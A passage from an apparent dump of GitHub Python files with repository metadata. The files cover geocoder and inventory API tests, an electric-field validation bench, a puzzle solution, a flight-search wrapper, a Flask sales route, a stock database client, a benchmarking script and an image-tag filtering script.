yt_client.create(\"table\", yt_table_path, attributes={\"schema\": schema}, recursive=True)\n yt_client.write_table(yt_table_path, data.read_table_from_file(data_path + \"/input\", path))\n\n toponyms_schema = data.read_table_from_file(data_path + \"/schema\", \"toponyms\")\n hierarchy_schema = data.read_table_from_file(data_path + \"/schema\", \"hierarchy\")\n\n _create_table(\"toponyms\", toponyms_schema)\n _create_table(\"pov/RU/hierarchy\", hierarchy_schema)\n _create_table(\"pov/UA/hierarchy\", hierarchy_schema)\n\n\ndef _create_geosrc_dir_resource(environment_settings):\n GEOCODER_DATA_PATH = yatest.common.test_source_path(\"data\")\n geosrc_dir_resource = YtDirectoryResource(\n name=offline_search_cache_validator.GEOSRC_YT,\n filename_template=\"//tmp/geocoder_export\",\n server=\"hahn\")\n geosrc_dir_resource.version = Version(properties={\"release\": VERSION})\n geosrc_dir_resource.load_environment_settings(environment_settings)\n yt_client = geosrc_dir_resource.get_yt_client()\n try:\n _create_tables(yt_client, geosrc_dir_resource, GEOCODER_DATA_PATH)\n except BaseException: # yt.common.YtResponseError():\n pass\n return geosrc_dir_resource\n\n\n@pytest.mark.use_local_yt(\"hahn\")\ndef test_load_toponyms_hierarchy(environment_settings):\n geosrc_dir_resource = _create_geosrc_dir_resource(environment_settings)\n yt_client = geosrc_dir_resource.get_yt_client()\n\n # YT data dependent tests. 
See input/pov/*/hierarchy\n toponym_to_geoid = tests_splitter.read_toponyms_yt(yt_client, geosrc_dir_resource.path)\n assert toponym_to_geoid == {\"1\": \"1\", \"3\": \"10\", \"4\": \"12\"}\n assert len(toponym_to_geoid) == 3\n assert toponym_to_geoid[\"1\"] == \"1\"\n assert toponym_to_geoid[\"3\"] == \"10\"\n assert toponym_to_geoid[\"4\"] == \"12\"\n\n cache_geoids = [\"1\", \"10\"] # Imagine we have only these two caches\n\n ru_hierarchy = tests_splitter.read_hierarchy_yt(yt_client, geosrc_dir_resource.path, toponym_to_geoid, \"RU\", cache_geoids)\n assert set(ru_hierarchy[\"1\"]) == set(\"1\")\n assert set(ru_hierarchy[\"10\"]) == set([\"1\", \"10\"])\n assert set(ru_hierarchy[\"12\"]) == set([\"1\", \"10\"])\n\n all_values = set()\n for geoids in ru_hierarchy.values():\n for geoid in geoids:\n all_values.add(geoid)\n assert all_values == set(cache_geoids) # All caches present and No extra caches left\n\n ua_hierarchy = tests_splitter.read_hierarchy_yt(yt_client, geosrc_dir_resource.path, toponym_to_geoid, \"UA\", cache_geoids)\n assert set(ua_hierarchy[\"1\"]) == set(\"1\")\n assert set(ua_hierarchy[\"10\"]) == set([\"10\"])\n assert set(ua_hierarchy[\"12\"]) == set([\"10\"])\n\n all_values = set()\n for geoids in ua_hierarchy.values():\n for geoid in geoids:\n all_values.add(geoid)\n assert all_values == set(cache_geoids)\n\n\ndef test_split_testset():\n testset = {\"tests\": [\n {\"expected\": {\"geoid\": 12}, \"request\": {\"lang\": \"ru_RU\", \"geocode\": \"test1\"}}, # Should be tested on geoid 12 and all its RU ancestors (1, 10)\n {\"expected\": {\"geoid\": 12}, \"request\": {\"lang\": \"uk_UA\", \"geocode\": \"test2\"}}, # Should be tested on geoid 12 and all its UA ancestors (10)\n {\"expected\": {\"geoid\": 10}, \"request\": {\"lang\": \"ru_RU\", \"geocode\": \"test3\"}},\n {\"expected\": {\"geoid\": 10}, \"request\": {\"lang\": \"uk_UA\", \"geocode\": \"test4\"}},\n {\"expected\": {\"geoid\": 1}, \"request\": {\"lang\": \"ru_RU\", \"geocode\": \"test5\"}},\n {\"expected\": {\"geoid\": 1}, \"request\": {\"lang\": \"uk_UA\", \"geocode\": \"test6\"}},\n {\"expected\": {\"geoid\": 1}, \"request\": {\"lang\": \"tr_TR\", \"geocode\": \"test7\"}}, # No cache for TR to be tested on\n ]}\n\n geoid_trees = { # geoid -> [ancestors and self]\n \"RU\": {\"1\": [\"1\"], \"10\": [\"1\", \"10\"], \"12\": [\"1\", \"10\", \"12\"]},\n \"UA\": {\"1\": [\"1\"], \"10\": [\"10\"], \"12\": [\"10\", \"12\"]},\n }\n\n split_tests = tests_splitter.split_testset_by_geoid_and_locale(testset, geoid_trees)\n\n def expect(split, expected):\n split_tests = set()\n for test in split:\n split_tests.add(test[\"request\"][\"geocode\"])\n\n assert split_tests == set(expected)\n\n expect(split_tests[\"1\"][\"ru_RU\"], [\"test1\", \"test3\", \"test5\"]) # All ru_RU tests related to geoid 1 or any of its RU children (10, 12)\n expect(split_tests[\"10\"][\"ru_RU\"], [\"test1\", \"test3\"])\n expect(split_tests[\"12\"][\"ru_RU\"], [\"test1\"])\n expect(split_tests[\"1\"][\"uk_UA\"], [\"test6\"])\n expect(split_tests[\"10\"][\"uk_UA\"], [\"test2\", \"test4\"])\n expect(split_tests[\"12\"][\"uk_UA\"], [\"test2\"])\n\n\n@pytest.mark.use_local_yt(\"hahn\")\ndef test_BuildGeoidTreesTask(environment_settings): # All the tests as above combined to a Task\n path, content = (\"fake_cache_file\", b\"fake cache data\")\n name = \"fake_cache\"\n cache_resource = FileResource(name, path)\n cache_resource.version = Version(properties={\"release\": VERSION})\n cache_resource.load_environment_settings(environment_settings)\n\n with 
cache_resource.open(\"wb\") as file:\n file.write(content)\n\n cache_resource.logged_commit()\n assert cache_resource.physically_exists\n\n caches = {\n \"search_2_cache_file_ru_RU_1_single_file\": cache_resource,\n \"search_2_cache_file_ru_RU_10_single_file\": cache_resource,\n \"search_2_cache_file_uk_UA_1_single_file\": cache_resource,\n \"search_2_cache_file_uk_UA_10_single_file\": cache_resource\n }\n\n # Create output resource\n geoid_trees_resource = FileResource(GEOID_TREES_BY_POVS, \"geoid_trees.json\")\n geoid_trees_resource.version = Version(properties={\"release\": VERSION})\n geoid_trees_resource.load_environment_settings(environment_settings)\n\n geosrc_dir_resource = _create_geosrc_dir_resource(environment_settings)\n\n # Run task\n task = tests_splitter.BuildGeoidTreesTask()\n task.load_environment_settings(environment_settings)\n task(geoid_trees=geoid_trees_resource, geosrc=geosrc_dir_resource, **caches)\n\n with open(geoid_trees_resource.path()) as res:\n trees = json.load(res)\n\n assert trees == {\n \"RU\": {\"1\": [\"1\"], \"10\": [\"1\", \"10\"], \"12\": [\"1\", \"10\"]},\n \"UA\": {\"1\": [\"1\"], \"10\": [\"10\"], \"12\": [\"10\"]},\n }\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_splitter.py","file_name":"test_splitter.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36276764907","text":"from common import inventory_attributes, management_client, clean_db, mongo\n\nimport os\nimport pytest\nimport random\n\n\n@pytest.mark.usefixtures(\"clean_db\")\nclass TestDeviceCreation:\n\n def verify_inventory(self, inventory, expected):\n assert len(inventory) == len(expected)\n\n print(\"inventory:\", inventory, \"expected:\", expected)\n for e in expected:\n if e not in inventory:\n assert False, \"Inventory data is incorrect\"\n\n\n def test_create_device_id_too_large(self, management_client, inventory_attributes):\n deviceid = \"\".join([ format(i, \"02x\") for i in os.urandom(508)])\n deviceNew = management_client.deviceNew(id=deviceid,\n attributes=inventory_attributes)\n try:\n r, _ = management_client.client.devices.post_devices(device=deviceNew,\n Authorization=\"foo\").result()\n except Exception as e:\n assert e.response.status_code == 500\n else:\n pytest.fail()\n\n def test_create_device_id_too_small(self, management_client, inventory_attributes):\n deviceNew = management_client.deviceNew(id=\"\",\n attributes=inventory_attributes)\n try:\n management_client.client.devices.post_devices(device=deviceNew,\n Authorization=\"foo\").result()\n except Exception as e:\n assert \"ID: non zero value required\" in str(e)\n\n def test_create_device_and_get(self, management_client, inventory_attributes):\n deviceid = \"\".join([ format(i, \"02x\") for i in os.urandom(128)])\n\n deviceNew = management_client.deviceNew(id=deviceid,\n attributes=inventory_attributes)\n management_client.client.devices.post_devices(device=deviceNew,\n Authorization=\"foo\").result()\n r, _ = management_client.client.devices.get_devices_id(id=deviceid,\n Authorization=\"foo\").result()\n self.verify_inventory(inventory_attributes,\n [management_client.inventoryAttribute(name=attr.name,\n value=attr.value,\n description=attr.description) \\\n for attr in r.attributes])\n\n def test_get_client_nonexisting_id(self, management_client):\n deviceid = \"test\" + str(random.randint(0, 99999999))\n try:\n r, _ = 
management_client.client.devices.get_devices_id(id=deviceid,\n Authorization=\"foo\").result()\n except Exception as e:\n assert e.response.status_code == 404\n else:\n pytest.fail()\n","repo_name":"PiotrPrzybylak/inventory","sub_path":"tests/tests/test_creating_devices.py","file_name":"test_creating_devices.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"34962396106","text":"#!/bin/python\nimport random\n\n# Complete the function below to print 2 integers separated by a single space which will be your next move\ndef nextMove(player,board):\n print (1, 0)\n\n\n#If player is X, I'm the first player.\n#If player is O, I'm the second player.\nplayer = raw_input()\n\n#Read the board now. The board is a 3x3 array filled with X, O or _.\nboard = []\nfor i in xrange(0, 3):\n board.append(raw_input())\n\nnextMove(player,board)","repo_name":"thanpolas/hackerrank","sub_path":"01.tictactoe/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9016127370","text":"import ElectricFieldPredictor\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy.fft import fft, fftfreq\n\n\"\"\" This code uses the following paper to validate ElectricFieldCalculator.py\n\n Documentation: D. H. Boteler, R. J. Pirjola and L. Marti, \"Analytic Calculation of \n Geoelectric Fields Due to Geomagnetic Disturbances: A Test Case,\" \n in IEEE Access, vol. 7, pp. 147029-147037, 2019, doi: 10.1109/ACCESS.2019.2945530.\n\"\"\"\n\nquebec_res = pd.read_csv('Quebec_1D_model.csv') \ntime = np.arange(0,43200,0.5)\n\nmu0 = 4 * np.pi * 10**(-7)\n\n\n\n# the data in the following arrays are taken from the tables in the documentation above\nA_m = [200, 90, 30, 17, 8, 3.5, 1]\nphi_m = np.array([10, 20, 30, 40, 50, 60, 70], dtype=float)*np.pi/180.0\nf_m = [0.00009259, 0.00020833, 0.00047619, 0.00111111, 0.00238095, 0.00555555, 0.025]\nB = np.zeros(time.size)\n\nE_m = np.array([43.76735, 40.32326, 26.04161, 26.16634, 20.74819, 16.31864, 9.60469])*10**(-3)\nphi_m2 = np.array([87.15, 93.76, 97.19, 102.08, 110.58, 114.97, 114.38])*np.pi/180.0\n\nE = np.zeros(time.size)\nk = np.zeros(7)\nk_phi = np.zeros(7)\n\n\n# calculate the earth response using the ElectricFieldCalculator and compare with the results in the paper\nfor i in range(7):\n k_i = ElectricFieldPredictor.k_f(quebec_res, f_m[i])\n k[i] = abs(k_i) * 10**(-3)\n k_phi[i] = np.arctan2(k_i.imag,k_i.real) * 180/np.pi\n\nK_mag_expected = [0.2188, 0.4480, 0.8681, 1.5392, 2.5935, 4.6625, 9.6047]\nK_phase_expected = [77.15, 73.76, 67.17, 62.08, 60.58, 54.97, 44.38]\n\n# test Earth transfer function\nnum_failed_mag = 0\nnum_failed_phase = 0\nfor i in range(7):\n print(\"F, K_mag_expected, k_actual: \",f_m[i], K_mag_expected[i], k[i])\n print(\"F, K_phase_expected, k_actual: \",f_m[i], K_phase_expected[i], k_phi[i])\n if k[i] < K_mag_expected[i] - K_mag_expected[i]*0.01 or k[i] > K_mag_expected[i] + K_mag_expected[i]*0.01:\n num_failed_mag += 1\n print(f'Earth Response magnitude Incorrect! Expected: {K_mag_expected[i]}, got {k[i]}')\n if k_phi[i] < K_phase_expected[i] - K_phase_expected[i]*0.01 or k_phi[i] > K_phase_expected[i] + K_phase_expected[i]*0.01:\n num_failed_phase += 1\n print(f'Earth Response phase Incorrect! 
Expected: {K_phase_expected[i]}, got {k_phi[i]}')\n\nif num_failed_mag == 0:\n print(\"All Earth Response magnitude tests pass\")\nelse:\n print(f'{num_failed_mag} Earth response magnitude tests failed')\n\nif num_failed_phase == 0:\n print(\"All Earth Response phase tests pass\")\nelse:\n print(f'{num_failed_phase} Earth response phase tests failed')\n\n# generate synthetic electric and magnetic fields in the paper\nfor t in range(time.size):\n for m in range(7):\n B[t] += A_m[m] * np.sin(2*np.pi*f_m[m]*time[t] + phi_m[m])\n E[t] += E_m[m] * np.sin(2*np.pi*f_m[m]*time[t] + phi_m2[m])\n\n# calculate e field from the synthetic magnetic field and compare with the synthetic magnetic field\nmy_E_field = ElectricFieldPredictor.B_to_E(quebec_res, B, time, 1)\n\nplt.subplot(3,1,1)\nplt.plot(time, B, label='Magnetic Field Test Data')\nplt.legend()\nplt.ylabel('Magnetic Field (nT)')\nplt.xlabel('time (s)')\n\nplt.subplot(3,1,2)\nplt.plot(time, E, label='Electric Field Comparison Data')\nplt.legend()\nplt.ylabel('Electric Field (V/km)')\nplt.xlabel('time (s)')\nplt.subplot(3,1,3)\nplt.plot(time, my_E_field, label='Electric Field Calculated Data')\n\nplt.ylabel('Electric Field (V/km)')\nplt.xlabel('time (s)')\nplt.legend()\nplt.subplots_adjust(left=0.15,\n bottom=0.1,\n right=0.9,\n top=0.95,\n hspace=0.6)\nplt.show()\n\n# calculate correlation coefficient of the actual and expected electric fields\nrho = np.cov(E,my_E_field)[0][1]/np.sqrt(np.var(E)*np.var(my_E_field))\nprint(\"Electric Field Correlation Coefficient\", rho)\n\n\n","repo_name":"scriptedfire/blueeye1_capstone","sub_path":"Application/Electric_field_calculator_test_bench.py","file_name":"Electric_field_calculator_test_bench.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30324591310","text":"from pathlib import Path\nimport functions\n\ndir = Path(__file__).parent.resolve()\n\nfilename = dir / \"input.txt\"\n\n\ndef step_head(curr, dir):\n x, y = curr\n if dir == \"R\":\n return (x + 1, y)\n if dir == \"L\":\n return (x - 1, y)\n if dir == \"U\":\n return (x, y + 1)\n\n # down\n return (x, y - 1)\n\n\ndef step_tail(head, tail):\n xdelta = head[0] - tail[0]\n ydelta = head[1] - tail[1]\n\n if abs(xdelta) < 2 and abs(ydelta) < 2:\n # dont move\n return tail\n\n if xdelta == 0:\n # move y\n return (tail[0], tail[1] + ydelta / abs(ydelta))\n\n if ydelta == 0:\n # move x\n return (tail[0] + xdelta / abs(xdelta), tail[1])\n\n # move diagonally\n return (tail[0] + xdelta / abs(xdelta), tail[1] + ydelta / abs(ydelta))\n\n\ndef task1():\n movements = functions.read_file_to_list(filename, str)\n\n visited = set()\n\n head = tail = (0, 0)\n for movement in movements:\n dir, moves = movement.split(\" \")\n\n for _ in range(int(moves)):\n head = step_head(head, dir)\n tail = step_tail(head, tail)\n\n visited.add(tail)\n\n answer = len(visited)\n\n print(\"\\tAnswer: \", answer)\n\n\ndef task2():\n movements = functions.read_file_to_list(filename, str)\n\n visited = set()\n\n knots = {nr: (0, 0) for nr in range(0, 10)}\n\n for movement in movements:\n dir, moves = movement.split(\" \")\n\n for _ in range(int(moves)):\n for knot in knots:\n if knot == 0:\n knots[knot] = step_head(knots[knot], dir)\n else:\n knots[knot] = step_tail(knots[knot - 1], knots[knot])\n\n if knot == 9:\n visited.add(knots[knot])\n\n answer = len(visited)\n\n print(\"\\tAnswer: \", answer)\n\n\nif __name__ == \"__main__\":\n print(\"========== Task 1 ==========\")\n 
task1()\n print(\"============================\\n\")\n\n print(\"========== Task 2 ==========\")\n task2()\n print(\"============================\")\n","repo_name":"jonajo15/Advent-of-Code-22","sub_path":"src/days/9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27779498830","text":"import requests\n\n\nclass FlightSearch:\n\n\tdef __init__(self, api_key):\n\t\tself.api_key = api_key,\n\t\tself.headers = {\"apikey\": api_key}\n\t\tself.api_endpoint = \"https://tequila-api.kiwi.com/v2/search\"\n\t\tself.flight_data = None\n\n\tdef get_flight_info(self, fly_from, fly_to, date_from, date_to, return_from, return_to, max_stopovers):\n\t\t\"\"\"\n\t\t:param str fly_from: city IATA code\n\t\t:param str fly_to: city IATA code\n\t\t:param str date_from: start date range (e.g. \"25/03/2000\")\n\t\t:param str date_to: end date range (e.g. 12/05/2001)\n\t\t:param str return_from: start date range for return (e.g. 25/07/2001)\n\t\t:param str return_to: end date range for return (e.g. 25/09/2001)\n\t\t:param str curr: currency for flight fare (e.g. \"USD\")\n\t\t:param int max_stopovers: number of stopovers (e.g. 2)\n\t\t:return: a list containing available flights\n\t\t\"\"\"\n\t\tdata = {\n\t\t\t\"fly_from\": fly_from,\n\t\t\t\"fly_to\": fly_to,\n\t\t\t\"date_from\": date_from,\n\t\t\t\"date_to\": date_to,\n\t\t\t\"return_from\": return_from,\n\t\t\t\"return_to\": return_to,\n\t\t\t\"curr\": \"USD\",\n\t\t\t\"max_stopovers\": max_stopovers,\n\n\t\t}\n\n\t\tresponse = requests.get(url=self.api_endpoint, params=data, headers=self.headers)\n\t\tself.flight_data = response.json()\n\t\treturn self.flight_data\n\n\tdef find_cheapest_flights(\n\t\t\tself, fly_from, fly_to, date_from, date_to, return_from, return_to, max_stopovers):\n\t\t\"\"\"\n\t\t:param str fly_from: city IATA code\n\t\t:param str fly_to: city IATA code\n\t\t:param str date_from: start date range (e.g. \"25/03/2000\")\n\t\t:param str date_to: end date range (e.g. 12/05/2001)\n\t\t:param str return_from: start date range for return (e.g. 25/07/2001)\n\t\t:param str return_to: end date range for return (e.g. 25/09/2001)\n\t\t:param int max_stopovers: number of stopovers (e.g. 
2)\n\t\t:return: a specified number of cheapest flights available\n\t\t\"\"\"\n\t\tself.get_flight_info(fly_from, fly_to, date_from, date_to, return_from, return_to, max_stopovers)\n\t\tfares_dict = []\n\t\tfor flight in self.flight_data['data']:\n\t\t\tflight_info = {\n\t\t\t\t\"carrier\": flight['airlines'][0],\n\t\t\t\t\"departure\": flight['flyFrom'],\n\t\t\t\t\"arrival\": flight[\"flyTo\"],\n\t\t\t\t\"price\": flight['fare']['adults'],\n\t\t\t\t\"departure_date_time\": flight['local_departure'],\n\t\t\t\t\"arrival_date_time\": flight['local_arrival']\n\t\t\t}\n\t\t\tfares_dict.append(flight_info)\n\n\t\t# Sort the list of dictionaries by fare in ascending order\n\t\tsorted_fares = sorted(fares_dict, key=lambda x: x['price'])\n\n\t\treturn sorted_fares[:1]\n\n\n","repo_name":"olabanjialadejana/FlightTracker","sub_path":"flight_search.py","file_name":"flight_search.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4604449432","text":"from flask import Blueprint, render_template, request, flash, redirect, url_for, session\nfrom utils.db import db\nfrom models.sale import Sale\nfrom models.product_sale import ProductSale\nfrom sqlalchemy import text\nfrom uuid import uuid4\n\nseller = Blueprint(\"seller\", __name__, static_folder=\"static\", template_folder=\"templates\")\n\nclass DataError(Exception):\n pass\n\n@seller.before_request\ndef before_request():\n if not \"user_name\" in session or session[\"user_role\"] != 1:\n return redirect(url_for(\"login\"))\n \n@seller.route('/')\ndef home():\n return render_template(\"seller.jinja\")\n\n@seller.route('/add_sale')\ndef add_sale():\n return render_template(\"add_sale.jinja\")\n\n@seller.route('/process_sale', methods=['POST'])\ndef process_sale():\n str_ids = request.form.getlist(\"product_id[]\")\n str_amounts = request.form.getlist(\"amount[]\")\n amounts: list[int] = []\n ids: list[int] = []\n client_id = request.form.get(\"client_id\")\n\n try:\n if client_id is None or client_id.isspace() or not client_id.isalnum():\n raise DataError(\"ID del cliente invalido\")\n\n if len(str_ids) == 0:\n raise DataError(\"No se ingresaron productos.\")\n\n # Check for valid values\n for product_id, amount in zip(str_ids, str_amounts):\n if not product_id.isnumeric():\n raise DataError(\"El ID de un producto no puede ser vacio.\")\n \n elif not amount.isnumeric():\n raise DataError(\"Las cantidades deben ser enteros positivos mayores a 0.\")\n \n amounts.append(int(amount))\n ids.append(int(product_id))\n \n # Get all products with the user provided IDs\n values = ','.join(str_ids)\n query = text(f'SELECT * FROM inventory.product WHERE product_id IN ({values})')\n result = db.session.execute(query).all()\n set_ids = set([row.product_id for row in result])\n\n # If missing IDS, an invalid ID was inserted\n if len(result) != len(ids):\n for i in ids:\n if i not in set_ids:\n raise DataError(f\"ID de producto invalido: {i}\")\n elif ids.count(i) > 1:\n raise DataError(f\"ID de producto repetido: {i}\")\n\n # tuple (id, amount)\n form_data = list(zip(ids, amounts))\n form_data.sort(key=lambda x: x[0])\n\n # Calculate sale price and check for valid amount\n total_price = 0\n sale_products: list[ProductSale] = []\n sale_id = uuid4()\n for row, data in zip(result, form_data):\n if row.product_amount < data[1]:\n raise DataError(f\"La cantidad comprada de {row.product_name} excede el inventario.\\\n Cantidad Disponible: ({row.product_amount}).\")\n \n 
total_price += row.product_price * data[1]\n sale_products.append(ProductSale(sale_id=sale_id, product_id=row.product_id, amount=data[1]))\n\n sale = Sale(sale_id, total_price, session[\"user_id\"], client_id)\n db.session.add(sale)\n db.session.commit()\n db.session.add_all(sale_products)\n db.session.commit()\n \n flash(\"Venta exitosa\")\n\n except DataError as e:\n flash(str(e))\n\n except Exception as e:\n flash(\"Ha ocurrido un error inesperado.\")\n print(e)\n\n return redirect(url_for(\"seller.add_sale\"))","repo_name":"Buitragox/point-of-sale","sub_path":"routes/seller.py","file_name":"seller.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28137709924","text":"import logging\nimport time\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom sqlalchemy.orm import sessionmaker\nfrom autotrader.datasource.database.stock_schema import BASE\n\n\nclass StockDataBase:\n \"\"\"\n Autotrader database client\n \"\"\"\n def __init__(self, sql_config, logger: logging.Logger):\n self.engine = None\n self.session = None\n self.db_session = None\n self.sessions = {}\n self.__sessions = {}\n self.logger = logger\n self.sql_config = sql_config\n\n def connect(self, database=None):\n \"\"\"\n Connect to the database\n :param database: name of database to connect\n :return: nothing\n \"\"\"\n if database is None:\n database = self.sql_config['database']\n if not self.session:\n url = 'mysql+pymysql://{}:{}@{}:{}/{}'.format(self.sql_config['user'],\n self.sql_config['pw'],\n self.sql_config['address'],\n self.sql_config['port'],\n database)\n # MySQL features an automatic connection close behavior,\n # for connections that have been idle for eight hours or more.\n # To circumvent having this issue, use the pool_recycle\n # option which controls the maximum age of any connection:\n self.engine = create_engine(url, pool_recycle=3600)\n self.db_session = sessionmaker(bind=self.engine)\n self.session = self.db_session()\n\n def is_connected(self):\n \"\"\"\n Checks if database connection is established\n :return: true if connection to database is established otherwise false\n \"\"\"\n return self.session is not None\n\n def create(self, database=None):\n \"\"\"\n Creates a database by given name\n :param url: sql url\n :param database: database name to create\n :return:\n \"\"\"\n if database is None:\n database = self.sql_config['database']\n\n url = 'mysql+pymysql://{}:{}@{}:{}'.format(self.sql_config['user'],\n self.sql_config['pw'],\n self.sql_config['address'],\n self.sql_config['port'])\n # MySQL features an automatic connection close behavior,\n # for connections that have been idle for eight hours or more.\n # To circumvent having this issue, use the pool_recycle\n # option which controls the maximum age of any connection:\n self.engine = create_engine(url, pool_recycle=3600)\n if self.engine and database:\n # create db if not exist\n try:\n self.engine.execute(\"CREATE DATABASE IF NOT EXISTS {}\".format(database))\n except SQLAlchemyError:\n self.logger.exception(\"Error during create:\")\n return False\n self.engine.execute(\"USE {}\".format(database))\n BASE.metadata.create_all(self.engine)\n return True\n\n def delete(self, db_session_object):\n if db_session_object in self.session.new:\n self.session.expunge(db_session_object)\n else:\n self.session.delete(db_session_object)\n\n def commit(self, error_counter=0):\n \"\"\"\n\n :return:\n \"\"\"\n try:\n 
self.session.commit()\n return\n except BrokenPipeError or SQLAlchemyError:\n self.logger.warning(\"Error during commit error count {}.\".format(error_counter))\n if error_counter > 5:\n error_counter += 1\n time.sleep(100)\n self.session.connect()\n self.commit(error_counter)\n return\n raise RuntimeError(\"Commit was not successful\")\n\n def close(self):\n \"\"\"\n Closes current session\n :return:\n \"\"\"\n if self.session:\n self.session.close()\n\n def drop(self, database=None):\n \"\"\"\n Drop an existing database\n :param database: name of database\n :return:\n \"\"\"\n if database is None:\n database = self.sql_config['database']\n url = 'mysql+pymysql://{}:{}@{}:{}'.format(self.sql_config['user'],\n self.sql_config['pw'],\n self.sql_config['address'],\n self.sql_config['port'])\n # MySQL features an automatic connection close behavior,\n # for connections that have been idle for eight hours or more.\n # To circumvent having this issue, use the pool_recycle\n # option which controls the maximum age of any connection:\n self.engine = create_engine(url, pool_recycle=3600)\n if self.engine and database:\n # create db if not exist\n try:\n sql_statement = \"DROP DATABASE IF EXISTS {}\".format(database)\n self.engine.execute(sql_statement)\n except SQLAlchemyError:\n self.logger.exception(\"Error during drop:\")\n","repo_name":"SlashGordon/autotrader","sub_path":"autotrader/datasource/database/stock_database.py","file_name":"stock_database.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20423766469","text":"from django.core.exceptions import ObjectDoesNotExist\n\nfrom server.middleware import JSONException\n\n\nWAITING_FOR_PLAYERS = 1\nRUNNING = 2\nOVER = 3\n\nGAME_STATUSES = (\n (WAITING_FOR_PLAYERS, u\"Waiting for players\"),\n (RUNNING, u\"Game running now\"),\n (OVER, u\"Game over\"),\n)\n\n\nPLAYING = 1\nQUIT = 2\nLOST = 3\nWON = 4\n\nPLAYER_STATUSES = (\n (PLAYING, \"Playing\"),\n (QUIT, \"Quit\"),\n (LOST, \"Lost\"),\n (WON, \"Won\"),\n)\n\n\ndef split_ints(string):\n if not string:\n return []\n else:\n return map(int, string.split(','))\n\n\ndef jsonified_exceptions(fn):\n def wrapped(*args, **kwargs):\n try:\n return fn(*args, **kwargs)\n except ObjectDoesNotExist as e:\n # Raises an exception which will be caught by the\n # JSONExceptionMiddleware and sent as the response\n raise JSONException(str(e), 404)\n # except Exception as e:\n # raise JSONException(str(e), 500)\n return wrapped\n","repo_name":"jamesandres/FiveDice","sub_path":"server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32219432608","text":"\"\"\"\nBenchmark an arbitrary console command by executing it a certain number of times.\n\nExample: python benchmark.py python prodigy/cli.py --engine ginac main pgfexamples/inference/piranha.pgcl\n\"\"\"\n\nimport subprocess\nimport sys\n\nfrom prodigy.util.color import Style\n\ncount = 20\ntimeout = 90\n\ntimes = []\nfor i in range(count):\n print(f\"\\ron iteration {i + 1}/{count}...\", end=\"\")\n # Choose timing behavior by commenting out\n psi_timings = True\n # psi_timings = False\n if psi_timings:\n result = subprocess.check_output(sys.argv[1:], timeout=timeout)\n if \"seconds\" not in result.decode().splitlines()[-2]:\n times.append(float(result.decode().splitlines()[-3].split()[0]))\n else:\n 
times.append(float(result.decode().splitlines()[-2].split()[0]))\n else:\n result = subprocess.check_output(sys.argv[1:], timeout=timeout)\n times.append(float(result.decode().splitlines()[-1].split()[2]))\nprint(\"\\r\", end=\"\")\n\nprint(f\"{Style.OKCYAN}min:{Style.RESET} {min(times):.3f} seconds\")\nprint(f\"{Style.OKCYAN}max:{Style.RESET} {max(times):.3f} seconds\")\nprint(f\"{Style.OKCYAN}average:{Style.RESET} {(sum(times) / count):.3f} seconds\")\n\nprint()\nprint(f\"{Style.OKCYAN}Output:{Style.RESET}\\n{result.decode()}\")\n","repo_name":"LKlinke/Prodigy","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17773113182","text":"\nimport numpy as np\nimport nltk\nimport xml.etree.ElementTree as ET\nimport os\nfrom bs4 import BeautifulSoup\nimport enchant\nimport csv\nimport inflect\nimport shutil\n\n\n\ndef tag_filtering(tag_store_path, image_path):\n# 1)Remove all tags that contain non-English words, numerical terms, or symbols\n# 2)Remove all tags with less than or equal to 2 letters\n# 3)Replace plural tags with equivalent singular tags\n# 4)Remove images with less than 4 tags \n# 5)Assign indices to all unique tags \n\n# Store a list of images that pass all these filters and their corresponding tags\n\n\n d = enchant.Dict(\"en_US\")\n f = open(tag_store_path, 'w', encoding='UTF8')\n p_checker = inflect.engine()\n writer = csv.writer(f)\n Root = image_path\n feature_idx = ['Feature Index']\n\n\n for root, dirs, files in os.walk(Root, topdown=True):\n for name in files:\n temp = []\n temp.append(name)\n print(os.path.join(root, name))\n infile = open(os.path.join(root, name), \"r\",encoding=\"utf8\")\n contents = infile.read()\n soup = BeautifulSoup(contents,\"html.parser\")\n titles = soup.find_all('name')\n\n for title in titles:\n if title.get_text():\n if d.check(title.get_text()):\n a = str(title.get_text())\n if a.isalpha() and len(a)>2:\n temp_a = p_checker.singular_noun(a)\n if temp_a != False:\n a = temp_a\n ans = nltk.pos_tag([a])\n val = ans[0][1]\n if(val == 'NN' or val == 'NNS' or val == 'NNPS' or val == 'NNP'):\n \n if a not in temp:\n temp.append(a)\n infile.close()\n if (len(temp)>4):\n writer.writerow(temp)\n for i in range(1,len(temp)):\n if temp[i] not in feature_idx:\n feature_idx.append(temp[i])\n writer.writerow(feature_idx)\n\n\n f.close()\n\n\ndef tag_to_binary(tag_idx_path, string_tag_path, binary_tag_store_path):\n\n # Convert string tags to binary form based on tag index\n \n feature_idx_path = tag_idx_path\n feature_idx = []\n with open(feature_idx_path) as f:\n for row in f:\n \n feature_idx.append 